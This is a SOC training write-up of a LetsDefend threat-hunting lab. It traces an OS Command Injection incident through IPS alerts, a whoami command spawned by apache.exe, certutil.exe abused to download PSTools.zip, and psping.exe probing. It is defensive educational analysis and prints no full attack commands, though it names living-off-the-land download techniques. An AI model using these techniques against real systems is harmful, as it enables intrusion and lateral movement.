This write-up is based on a training scenario from LetsDefend and is shared for educational purposes only.

Hello everyone, I'm Fir (find me on LinkedIn). In this article, I'll share my threat hunting investigation based on a network-based attack scenario from LetsDefend.

In this lab, I investigated an OS Command Injection attack by analyzing IPS alerts, firewall logs, and endpoint telemetry to understand attacker behavior and post-exploitation activity.

๐Ÿง  Hypothesis

Attackers could exploit web applications to execute system-level commands remotely, potentially leading to further compromise or lateral movement.

Step 1 : IPS Detection (Initial Attack Identification)

I started by analyzing IPS logs to identify suspicious attack activity. This indicates the attack was detected but not blocked.

Attacker IP: 124.31.2.92
Attacker type: OS Command Injection Atttempt
Firewall action: alert
None

Step 2 : Command Execution Analysis

I analyzed what command was executed during the attack. This confirm initial reconnaissance, commonly used to identify the running user context.

Command executed : whoami

Step 3 : EDR Investigation (Process Analysis)

I pivoted into endpoint telemetry to analyze process execution. This shows command was executed via the web server process, confirming exploitation of a web application.

Parent process : C:\Windows\System32\apache.exe

Step 4 : LOLBins Abuse

Further investigation revealed additional suspicious activity. Indicated attacker used Living-off-the-Land techniques to download tools for further actions.

LOLBind used : certutil.exe 
File downloaded : PSTools.zip
None
None

Step 5 : Suspicious Network Activity

I then analyzed outbound connections from the endpoint. This suggests potential network probing or lateral movement activity.

Suspicious process : psping.exe
None

Conclusion

This investigation shows how a simple web vulnerability can lead to deeper compromise. The IPS successfully detected an OS Command Injection attempt, but the attack was not blocked, allowing the attacker to execute reconnaissance commands like whoami. The activity was traced back to the web server process (apache.exe), confirming exploitation through the application layer. Further analysis revealed the use of LOLBins such as certutil.exe to download additional tools, along with suspicious network activity initiated by psping.exe. This demonstrates that even low-level alerts can evolve into more serious threats if not properly investigated and mitigated

Thanks for reading! If you're learning threat hunting or SOC analysis, feel free to share your thoughts in the comments ๐Ÿ‘‹ What kind of attack scenario are you exploring next? ๐Ÿ”ฅ